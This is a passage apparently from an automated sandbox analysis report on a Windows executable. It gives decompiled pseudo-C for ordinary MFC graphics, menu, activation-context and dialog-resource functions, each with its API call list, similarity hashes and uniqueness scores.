                  • GetObjectW.GDI32(?,00000018,?), ref: 00414D14
                    • Part of subcall function 004149CC: CreateBitmap.GDI32(?,?,?,?,?), ref: 004149E3
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00414D8F
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F3B
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F48
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00414DBC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 00414DE1
                    • Part of subcall function 00421C10: SetBkColor.GDI32(?,?), ref: 00421C21
                    • Part of subcall function 00421C10: ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00421C53
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,00000000), ref: 00414ABF
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,?), ref: 00414AD5
                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 00414E35
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 00414E54
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$CreateObject$H_prolog3Select$BitmapBrushCompatiblePixelSolidText
                  • String ID: 6AA$BAA
                  • API String ID: 3190328746-1136626083
                  • Opcode ID: 1938a53352adc42c069018131827be4703896d88b23682facd8ae4c430c7562a
                  • Instruction ID: 0111c0a72b243d836fdaceae801d860e5bcb95e3b8eb1b6f562e39f6b05ac663
                  • Opcode Fuzzy Hash: 1938a53352adc42c069018131827be4703896d88b23682facd8ae4c430c7562a
                  • Instruction Fuzzy Hash: AD7123B1C0020DBADF05EFE1DC81AEEBB79AF58308F10802AF515761A1DB395E95DB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 98%
                  			E00421CD5(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t131;
                  				intOrPtr _t195;
                  				intOrPtr* _t223;
                  				void* _t226;
                  
                  				_push(0x38);
                  				E0042922B(E004395FB, __ebx, __edi, __esi);
                  				_t223 = __ecx;
                  				 *((intOrPtr*)(_t226 - 0x30)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x440a28;
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x28)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x440a28;
                  				 *((intOrPtr*)(_t226 - 0x20)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x440a28;
                  				 *(_t226 - 4) = 2;
                  				E00421ADD(_t226 - 0x2c,  *(_t226 + 8));
                  				E00415CDB(_t226 - 0x44,  *(_t226 + 8));
                  				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
                  				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
                  				E00421ADD(_t226 - 0x24, _t226 - 0x44);
                  				E00414938(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
                  				E00421B1B(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
                  				_t228 =  *((intOrPtr*)(_t226 + 0x20));
                  				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x20)) = E00421B6B(0, _t223, 0x440a28, _t228);
                  				}
                  				_t195 =  *((intOrPtr*)(_t226 + 0x20));
                  				if((0 | _t195 != 0x00000000) == 0) {
                  					E00413DD0(_t195);
                  				}
                  				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
                  				}
                  				 *((intOrPtr*)(_t226 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x440a28;
                  				 *((intOrPtr*)(_t226 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x440a28;
                  				 *(_t226 - 4) = 4;
                  				if( *(_t226 + 0x14) != 0) {
                  					E00414938(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
                  					E00421AFB(_t226 - 0x2c,  *(_t226 + 0x14));
                  					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
                  					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
                  					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
                  					E00421AFB(_t226 - 0x24, _t226 - 0x44);
                  					E00421B1B(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
                  						E00414938(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
                  						E00421B1B(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
                  					}
                  				}
                  				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
                  					E004144B7(_t223, _t226 - 0x1c);
                  					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  					 *(_t226 + 0x14) = E00414A99(_t223,  *((intOrPtr*)(_t226 + 0x24)));
                  					E00421B4A(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  					E00414A99(_t223,  *(_t226 + 0x14));
                  				}
                  				_t131 = _t226 - 0x14;
                  				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
                  					_t131 = _t226 - 0x34;
                  				}
                  				E004144B7(_t223, _t131);
                  				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  				 *(_t226 + 0x14) = E00414A99(_t223,  *((intOrPtr*)(_t226 + 0x20)));
                  				E00421B4A(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  				_t238 =  *(_t226 + 0x14);
                  				if( *(_t226 + 0x14) != 0) {
                  					E00414A99(_t223,  *(_t226 + 0x14));
                  				}
                  				E004144B7(_t223, 0);
                  				 *(_t226 - 4) = 3;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x440a28;
                  				E00414B63(0, _t226 - 0x14, _t223, 0x440a28, _t238);
                  				 *(_t226 - 4) = 2;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x440a28;
                  				E00414B63(0, _t226 - 0x1c, _t223, 0x440a28, _t238);
                  				 *(_t226 - 4) = 1;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x440a28;
                  				E00414B63(0, _t226 - 0x24, _t223, 0x440a28, _t238);
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x440a28;
                  				E00414B63(0, _t226 - 0x2c, _t223, 0x440a28, _t238);
                  				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x440a28;
                  				return E00429303(E00414B63(0, _t226 - 0x34, _t223, 0x440a28,  *(_t226 - 4)));
                  			}








                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421CDC
                    • Part of subcall function 00421ADD: CreateRectRgnIndirect.GDI32(?), ref: 00421AE8
                    • Part of subcall function 00415CDB: CopyRect.USER32(?,?), ref: 00415CE7
                  • InflateRect.USER32(?,?,?), ref: 00421D29
                  • IntersectRect.USER32(?,?,?), ref: 00421D37
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421D4D
                    • Part of subcall function 00421B1B: CombineRgn.GDI32(?,?,?,?), ref: 00421B40
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421DB3
                  • CopyRect.USER32(?,?), ref: 00421DD4
                  • InflateRect.USER32(?,?,?), ref: 00421DEA
                  • IntersectRect.USER32(?,?,?), ref: 00421DF8
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421E2E
                    • Part of subcall function 00421B6B: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00421BB3
                    • Part of subcall function 00421B6B: CreatePatternBrush.GDI32(00000000), ref: 00421BC0
                    • Part of subcall function 00421B6B: DeleteObject.GDI32(00000000), ref: 00421BCC
                    • Part of subcall function 00421B4A: PatBlt.GDI32(?,?,?,?,?,?), ref: 00421B61
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,00000000), ref: 00414ABF
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,?), ref: 00414AD5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: HAA
                  • API String ID: 714730959-1769015848
                  • Opcode ID: 8c00e2d2a4cdf5e7b88d2cffe88812e096eafe5aee1730032a85124b1133b760
                  • Instruction ID: 9eed31c3002cd6e718cbcd265c8a4d8d7723fb3af71510aa55d37fd1cbd0f69c
                  • Opcode Fuzzy Hash: 8c00e2d2a4cdf5e7b88d2cffe88812e096eafe5aee1730032a85124b1133b760
                  • Instruction Fuzzy Hash: 719118B1A0010AEFCF01DFE5DA859EEBBB9BF58304F50411AF505A3251DB38AE05CB69
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 94%
                  			E0041F89A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t50;
                  				int _t60;
                  				int _t62;
                  				intOrPtr _t65;
                  				void* _t73;
                  				struct tagMENUITEMINFOW _t84;
                  				int _t87;
                  				intOrPtr _t104;
                  				intOrPtr _t109;
                  				void* _t111;
                  
                  				_push(0x54);
                  				E0042922B(E0043942F, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t111 - 0x10)) = __ecx;
                  				_t104 =  *((intOrPtr*)(_t111 + 8));
                  				_t50 =  *((intOrPtr*)(_t104 + 0x14));
                  				if(_t50 == 0) {
                  					 *(_t111 - 0x18) = GetSystemMetrics(0x32) + 2;
                  					_t109 = GetSystemMetrics(0x31) + 2;
                  					__eflags = _t109;
                  				} else {
                  					GetObjectW( *(_t50 + 4), 0x18, _t111 - 0x30);
                  					 *(_t111 - 0x18) =  *((intOrPtr*)(_t111 - 0x28)) + 2;
                  					_t109 =  *((intOrPtr*)(_t111 - 0x2c)) + 2;
                  				}
                  				E00404820(_t111 + 8);
                  				 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                  				_t84 = 0x30;
                  				E004281D0(_t104, _t111 - 0x60, 0, _t84);
                  				 *(_t111 - 0x60) = _t84;
                  				 *((intOrPtr*)(_t111 - 0x5c)) = 0x40;
                  				_t60 = GetMenuItemInfoW( *( *((intOrPtr*)(_t111 - 0x10)) + 4),  *(_t104 + 8), 0, _t111 - 0x60);
                  				_t116 = _t60;
                  				if(_t60 != 0) {
                  					_t65 = E00405860(_t111 + 8, _t116,  *((intOrPtr*)(_t111 - 0x38)));
                  					 *((intOrPtr*)(_t111 - 0x38)) =  *((intOrPtr*)(_t111 - 0x38)) + 1;
                  					 *((intOrPtr*)(_t111 - 0x3c)) = _t65;
                  					_t87 = GetMenuItemInfoW( *( *((intOrPtr*)(_t111 - 0x10)) + 4),  *(_t104 + 8), 0, _t111 - 0x60);
                  					E0040E100(_t87, _t111 + 8, _t104, 0xffffffff);
                  					_t117 = _t87;
                  					if(_t87 != 0) {
                  						_push(0);
                  						E0041478D(_t87, _t111 - 0x2c, _t104, _t109, _t117);
                  						 *(_t111 - 4) = 1;
                  						_t73 = E00414A99(_t111 - 0x2c,  *((intOrPtr*)(_t111 - 0x10)) + 8);
                  						E0041AA1C(_t111 - 0x2c, _t111 - 0x14, _t111 + 8);
                  						E00414A99(_t111 - 0x2c, _t73);
                  						_t109 = _t109 +  *((intOrPtr*)(_t111 - 0x14)) + 3;
                  						 *(_t111 - 4) = 0;
                  						E004147E1(_t73, _t111 - 0x2c, _t104, _t109,  *((intOrPtr*)(_t111 - 0x10)) + 8);
                  					}
                  				}
                  				if(GetSystemMetrics(0xf) <=  *(_t111 - 0x18)) {
                  					_t62 =  *(_t111 - 0x18);
                  				} else {
                  					_t62 = GetSystemMetrics(0xf);
                  				}
                  				 *(_t104 + 0x10) = _t62;
                  				 *((intOrPtr*)(_t104 + 0xc)) = _t109;
                  				return E00429303(E004055F0( *((intOrPtr*)(_t111 + 8)) + 0xfffffff0));
                  			}














                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F8A1
                  • GetObjectW.GDI32(?,00000018,?), ref: 0041F8BC
                  • GetSystemMetrics.USER32(00000032), ref: 0041F8DB
                  • GetSystemMetrics.USER32(00000031), ref: 0041F8E4
                  • _memset.LIBCMT ref: 0041F900
                  • GetMenuItemInfoW.USER32 ref: 0041F928
                  • GetMenuItemInfoW.USER32(00000000,?,00000000,?), ref: 0041F94F
                  • GetSystemMetrics.USER32(0000000F), ref: 0041F9B4
                  • GetSystemMetrics.USER32(0000000F), ref: 0041F9BD
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$InfoItemMenu$H_prolog3Object_memset
                  • String ID: @
                  • API String ID: 3341327673-2766056989
                  • Opcode ID: dfeea2197fba2efaec2f6360b973d6dd7e00af18c89edb1dd90b4de57aec6b85
                  • Instruction ID: fa553f11ab48a0546bf53c0ed4f1d4cd1c58e2803b6d83318a96144376cf12d7
                  • Opcode Fuzzy Hash: dfeea2197fba2efaec2f6360b973d6dd7e00af18c89edb1dd90b4de57aec6b85
                  • Instruction Fuzzy Hash: 5D417171900219AFCB04EFE4DC85BEEB7B8FF18304F04412AF615A7282DB74A945CB99
                  Uniqueness

                  Uniqueness Score: 12.89%

                  C-Code - Quality: 93%
                  			E0041CA2D(intOrPtr __ecx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				void* __ebp;
                  				intOrPtr _t5;
                  				_Unknown_base(*)()* _t10;
                  				struct HINSTANCE__* _t18;
                  				char _t22;
                  				intOrPtr _t24;
                  				_Unknown_base(*)()* _t25;
                  				_Unknown_base(*)()* _t26;
                  
                  				_push(__ecx);
                  				_t5 = __ecx;
                  				_t16 = _a4;
                  				 *((intOrPtr*)(__ecx)) = _a4;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				_v8 = __ecx;
                  				_t22 =  *0x44f9b0; // 0x0
                  				if(_t22 == 0) {
                  					_t18 = GetModuleHandleW(L"KERNEL32");
                  					if(_t18 == 0) {
                  						L2:
                  						E00413DD0(_t16);
                  					}
                  					 *0x44f9a0 = GetProcAddress(_t18, "CreateActCtxW");
                  					 *0x44f9a4 = GetProcAddress(_t18, "ReleaseActCtx");
                  					 *0x44f9a8 = GetProcAddress(_t18, "ActivateActCtx");
                  					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
                  					_pop(_t18);
                  					 *0x44f9ac = _t10;
                  					_t24 =  *0x44f9a0; // 0x0
                  					if(_t24 == 0) {
                  						__eflags =  *0x44f9a4; // 0x0
                  						if(__eflags != 0) {
                  							goto L2;
                  						} else {
                  							__eflags =  *0x44f9a8; // 0x0
                  							if(__eflags != 0) {
                  								goto L2;
                  							} else {
                  								__eflags = _t10;
                  								if(_t10 != 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					} else {
                  						_t25 =  *0x44f9a4; // 0x0
                  						if(_t25 == 0) {
                  							goto L2;
                  						} else {
                  							_t26 =  *0x44f9a8; // 0x0
                  							if(_t26 == 0) {
                  								goto L2;
                  							} else {
                  								if(_t10 == 0) {
                  									goto L2;
                  								}
                  							}
                  						}
                  					}
                  					_t5 = _v8;
                  					 *0x44f9b0 = 1;
                  				}
                  				return _t5;
                  			}













                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041CA56
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041CA73
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0041CA80
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0041CA8D
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 0041CA9A
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-2424895508
                  • Opcode ID: d5e5d5b353d9dc641aa9d336ee5124403e64daa888dfe1080729ee1a404a8e80
                  • Instruction ID: b16c5fe8cb7ee5c341957e0244876cc4e70becec17aa51119e1388a184e508b3
                  • Opcode Fuzzy Hash: d5e5d5b353d9dc641aa9d336ee5124403e64daa888dfe1080729ee1a404a8e80
                  • Instruction Fuzzy Hash: 881142B5D85358BECB21EF69ACC5A577EA4EA56750714013FE104C7231E3784988CA1E
                  Uniqueness

                  Uniqueness Score: 0.28%

                  C-Code - Quality: 100%
                  			E0041FEE8() {
                  				void* _t1;
                  				struct HINSTANCE__* _t2;
                  				_Unknown_base(*)()* _t6;
                  				void* _t7;
                  
                  				if( *0x44fa08 == 0) {
                  					_t2 = GetModuleHandleW(L"KERNEL32");
                  					 *0x44fa08 = _t2;
                  					if(_t2 == 0) {
                  						_t2 = E00413DD0(_t7);
                  					}
                  					 *0x44f9f4 = GetProcAddress(_t2, "CreateActCtxW");
                  					 *0x44f9f8 = GetProcAddress( *0x44fa08, "ReleaseActCtx");
                  					 *0x44f9fc = GetProcAddress( *0x44fa08, "ActivateActCtx");
                  					_t6 = GetProcAddress( *0x44fa08, "DeactivateActCtx");
                  					 *0x44fa00 = _t6;
                  					return _t6;
                  				}
                  				return _t1;
                  			}








                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32,00420002), ref: 0041FEF6
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041FF17
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041FF29
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041FF3B
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041FF4D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 2144170044-2424895508
                  • Opcode ID: 26caa32cc911c5a1d17336da9f3835d6e3b2b7817387ef73e5d7cc0fb7c4947b
                  • Instruction ID: 24ab1d7278d060f86f713ef97fe5e098ed9ac87127f2faf2f53f4ce9b08e43f6
                  • Opcode Fuzzy Hash: 26caa32cc911c5a1d17336da9f3835d6e3b2b7817387ef73e5d7cc0fb7c4947b
                  • Instruction Fuzzy Hash: ADF01CB8D45366AEDB006F79BC0AB473FA4A70A720B205137E858E2671D7B8508CCF5D
                  Uniqueness

                  Uniqueness Score: 0.28%

                  C-Code - Quality: 94%
                  			E0041EC43(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t54;
                  				void* _t58;
                  				signed int _t59;
                  				signed int _t63;
                  				signed int _t71;
                  				signed int _t84;
                  				void* _t94;
                  				struct HINSTANCE__* _t96;
                  				signed int _t97;
                  				void* _t98;
                  				signed int _t100;
                  				void* _t101;
                  				void* _t102;
                  
                  				_t102 = __eflags;
                  				_t94 = __edx;
                  				_push(0x24);
                  				E0042925E(E00439388, __ebx, __edi, __esi);
                  				_t100 = __ecx;
                  				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                  				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                  				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                  				_t54 = E0042083D(__ebx, __edi, __ecx, _t102);
                  				_t96 =  *(_t54 + 0xc);
                  				_t84 = 0;
                  				_t103 =  *(_t100 + 0x58);
                  				if( *(_t100 + 0x58) != 0) {
                  					_t96 =  *(E0042083D(0, _t96, _t100, _t103) + 0xc);
                  					_t54 = LoadResource(_t96, FindResourceW(_t96,  *(_t100 + 0x58), 5));
                  					 *(_t101 - 0x18) = _t54;
                  				}
                  				if( *(_t101 - 0x18) != _t84) {
                  					_t54 = LockResource( *(_t101 - 0x18));
                  					 *(_t101 - 0x1c) = _t54;
                  				}
                  				if( *(_t101 - 0x1c) != _t84) {
                  					_t86 = _t100;
                  					 *(_t101 - 0x14) = E0041E7B8(_t84, _t100, __eflags);
                  					E0040E2C7(_t84, _t96, __eflags);
                  					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                  					 *(_t101 - 0x2c) = _t84;
                  					 *(_t101 - 0x24) = _t84;
                  					__eflags =  *(_t101 - 0x14) - _t84;
                  					if(__eflags != 0) {
                  						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                  						if(__eflags != 0) {
                  							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                  							if(__eflags != 0) {
                  								EnableWindow( *(_t101 - 0x14), 0);
                  								 *(_t101 - 0x2c) = 1;
                  								_t84 = E0040CC4F();
                  								 *(_t101 - 0x24) = _t84;
                  								__eflags = _t84;
                  								if(__eflags != 0) {
                  									_t86 = _t84;
                  									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
                  									if(__eflags != 0) {
                  										_t86 = _t84;
                  										__eflags = E00411E53(_t84);
                  										if(__eflags != 0) {
                  											_t86 = _t84;
                  											E00411E6E(_t84, 0);
                  											 *(_t101 - 0x28) = 1;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                  					E00410178(_t84, __eflags, _t100);
                  					_t58 = E0040E20E(_t84, _t86,  *(_t101 - 0x14));
                  					_push(_t96);
                  					_push(_t58);
                  					_push( *(_t101 - 0x1c));
                  					_t59 = E0041EA88(_t84, _t100, _t94, _t96, _t100, __eflags);
                  					_t97 = 0;
                  					__eflags = _t59;
                  					if(_t59 != 0) {
                  						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                  						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                  							_t98 = 4;
                  							_t71 = E00411D59(_t100);
                  							__eflags = _t71 & 0x00000100;
                  							if((_t71 & 0x00000100) != 0) {
                  								_t98 = 5;
                  							}
                  							E0040DC98(_t100, _t98);
                  							_t97 = 0;
                  							__eflags = 0;
                  						}
                  						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
                  						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
                  							E00411EB6(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
                  						}
                  					}
                  					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                  					__eflags =  *(_t101 - 0x28) - _t97;
                  					if( *(_t101 - 0x28) != _t97) {
                  						E00411E6E(_t84, 1);
                  					}
                  					__eflags =  *(_t101 - 0x2c) - _t97;
                  					if( *(_t101 - 0x2c) != _t97) {
                  						EnableWindow( *(_t101 - 0x14), 1);
                  					}
                  					__eflags =  *(_t101 - 0x14) - _t97;
                  					if(__eflags != 0) {
                  						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
                  						if(__eflags == 0) {
                  							SetActiveWindow( *(_t101 - 0x14));
                  						}
                  					}
                  					 *((intOrPtr*)( *_t100 + 0x60))();
                  					E0041E7F4(_t84, _t100, _t97, _t100, __eflags);
                  					__eflags =  *(_t100 + 0x58) - _t97;
                  					if( *(_t100 + 0x58) != _t97) {
                  						FreeResource( *(_t101 - 0x18));
                  					}
                  					_t63 =  *(_t100 + 0x44);
                  					goto L31;
                  				} else {
                  					_t63 = _t54 | 0xffffffff;
                  					L31:
                  					return E00429303(_t63);
                  				}
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041EC4A
                  • FindResourceW.KERNEL32(?,?,00000005), ref: 0041EC7D
                  • LoadResource.KERNEL32(?,00000000), ref: 0041EC85
                    • Part of subcall function 0040E2C7: UnhookWindowsHookEx.USER32(?), ref: 0040E2F7
                  • LockResource.KERNEL32(?,00000024,004089A8,A6E2BCA1), ref: 0041EC96
                  • GetDesktopWindow.USER32 ref: 0041ECC9
                  • IsWindowEnabled.USER32(?), ref: 0041ECD7
                  • EnableWindow.USER32(?,00000000), ref: 0041ECE6
                    • Part of subcall function 00411E53: IsWindowEnabled.USER32(?), ref: 00411E5C
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  • EnableWindow.USER32(?,00000001), ref: 0041EDCB
                  • GetActiveWindow.USER32 ref: 0041EDD6
                  • SetActiveWindow.USER32(?), ref: 0041EDE4
                  • FreeResource.KERNEL32(?,?,00000024,004089A8,A6E2BCA1), ref: 0041EE00
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                  • String ID:
                  • API String ID: 964565984-0
                  • Opcode ID: fe0207d4ecd80c08f45642bcb39e6459c124003afb4992ac405e18d192ee7def
                  • Instruction ID: fde7dbc461ea99a3f7dbf453eac50beea4943e19dc7ae5404a43dc21f7068163
                  • Opcode Fuzzy Hash: fe0207d4ecd80c08f45642bcb39e6459c124003afb4992ac405e18d192ee7def
                  • Instruction Fuzzy Hash: 97518234A00706DBDB21AFA6D849AEEB7B1FF44705F14002FF942622E1DB795981CB5E
                  Uniqueness

                  Uniqueness Score: 0.32%

                  C-Code - Quality: 91%
                  			E00403330(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				char _v8;
                  				char _v16;
                  				char _v20;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				signed int _v32;
                  				char _v840;
                  				char _v844;
                  				intOrPtr _v848;
                  				char _v852;
